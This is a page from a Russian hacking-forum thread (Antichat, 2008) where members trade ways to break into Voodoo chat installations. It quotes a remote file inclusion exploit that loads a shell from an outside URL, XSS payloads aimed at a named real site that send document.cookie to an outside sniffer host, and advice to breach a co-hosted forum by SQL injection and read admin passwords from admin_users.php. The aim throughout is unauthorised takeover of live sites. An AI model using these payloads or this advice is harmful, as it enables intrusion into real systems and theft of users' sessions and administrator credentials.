HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
Перезагрузить страницу Voodoo чаты
   
 
Страница 23 из 26 « Первая < 13 19 20 21 22 23 24 25 26 >
 
Опции темы Поиск в этой теме Опции просмотра

  #221  
Старый 01.02.2008, 05:42
SEVKA
Новичок
Регистрация: 14.03.2005
Сообщений: 13
С нами: 11135711

Репутация: 0
По умолчанию
Народ , видал я вот такую багу в Voodoo :

Bug in : index.php
#
#Vlu Code :
#--------------------------------
#//here it can fails, i don't care. will be used default system language
#
# else
include_once($file_path."languages/".$language.".php");
#
#
include($file_path."designes/".$design."/index.php");
#?>
#================================================= ================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script
Path]/index.php?file_path=http://SHELLURL.COM?

только чего-то не выходит . пишет 404 ошибку . Так подскажите то ли я чего не так делаю , то ли пропачена уязвимость датирована она 2006-08-02 . Помогите разобраться
 

  #222  
Старый 01.02.2008, 12:49
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию
Патченная скорее всего версия...или просто другая версия)
 

  #223  
Старый 03.02.2008, 13:28
SEVKA
Новичок
Регистрация: 14.03.2005
Сообщений: 13
С нами: 11135711

Репутация: 0
По умолчанию
А может быть я чего-то недопонимаю , тогда те кто уже юзали сей эксплойт ... объясните на пальцах плиз ...
 

  #224  
Старый 20.02.2008, 01:04
schut123
Участник форума
Регистрация: 02.01.2007
Сообщений: 202
С нами: 10187606

Репутация: 99
По умолчанию
Народ, помогите пожалуйста с http://chat.gtn.ru
там есть
Код:
http://chat.gtn.ru/go.php?url=javascript:alert(/document.cookie/)
формирую запрос:
Код:
http://chat.gtn.ru/go.php?url=javascript:img%20=%20new%20Image();%20img.src%20=%20"http://s.netsec.ru/schut123.gif?"+document.cookie
но на сниф ничего не приходит.
так-же там есть
Код:
http://chat.gtn.ru//password_reminder.php?look_for=%3Cscript%3Ealert(document.cookie);%3C/script%3E>
формирую запрос:
Код:
 http://chat.gtn.ru//password_reminder.php?look_for="><script>img%20=%20new%20Image();%20img.src%20=%20"http://s.netsec.ru/schut123.gif?"+document.cookie;</script>
На снифере никакого эффекта. Пусто.

Подскажите, как быть.. Возможно я неправильно запрос составляю. Или что-то еще..
 

  #225  
Старый 20.02.2008, 13:06
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию
schut123 ты куки не поимешь..ибо в вуду там сессия идёт.......вообщем хсс не катит......
 

  #226  
Старый 20.02.2008, 14:28
schut123
Участник форума
Регистрация: 02.01.2007
Сообщений: 202
С нами: 10187606

Репутация: 99
По умолчанию
А как тогда можно админку получить? Насколько я понимаю сули там тоже нет...
Помогите найти уязвимости в этом чате, которыми можно реально воспользоваться.
 

  #227  
Старый 20.02.2008, 14:58
_Sniper_
Banned
Регистрация: 21.07.2007
Сообщений: 504
С нами: 9898343

Репутация: 445


По умолчанию
Цитата:
Сообщение от schut123  
А как тогда можно админку получить? Насколько я понимаю сули там тоже нет...
Помогите найти уязвимости в этом чате, которыми можно реально воспользоваться.
Раньше спичкой разрывал чаты такие. Пихаеш спичку в ENTER и ждёш..
 

  #228  
Старый 21.02.2008, 01:46
schut123
Участник форума
Регистрация: 02.01.2007
Сообщений: 202
С нами: 10187606

Репутация: 99
По умолчанию
Ну а по делу кто-нибудь скажет что-нибудь?
 

  #229  
Старый 19.04.2008, 20:57
goodkit
Участник форума
Регистрация: 19.05.2006
Сообщений: 181
С нами: 10514859

Репутация: 78
По умолчанию
По делу нет, а вот что бы такой чат похекать, надо хекать форум, канечно если такой есть, на том же сайте что и чат, БД одна на всех, мне это как то давно подсказали, и именно тогда получилось достать логины и пассы от админок в чате, а форум полет от sql inj.
 

  #230  
Старый 17.05.2008, 14:15
Neorin
Познающий
Регистрация: 30.04.2007
Сообщений: 67
С нами: 10016704

Репутация: 40
По умолчанию
дело говоришь..не только дело не в бд......самый простой спрособ взломать вуду енто найти на бажный форум, или стартовую(обычно стоят дефаил) потом лезишь сюды
/home/****/public_html/chat/admin/admin_users.php а там проль в админку лежит в каком виде ,
<?php $admin_users[0]["nickname"] = "***"; $admin_users[0]["password"] = "****"; ?>

самый простой способ!)
 
 
Страница 23 из 26 « Первая < 13 19 20 21 22 23 24 25 26 >



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.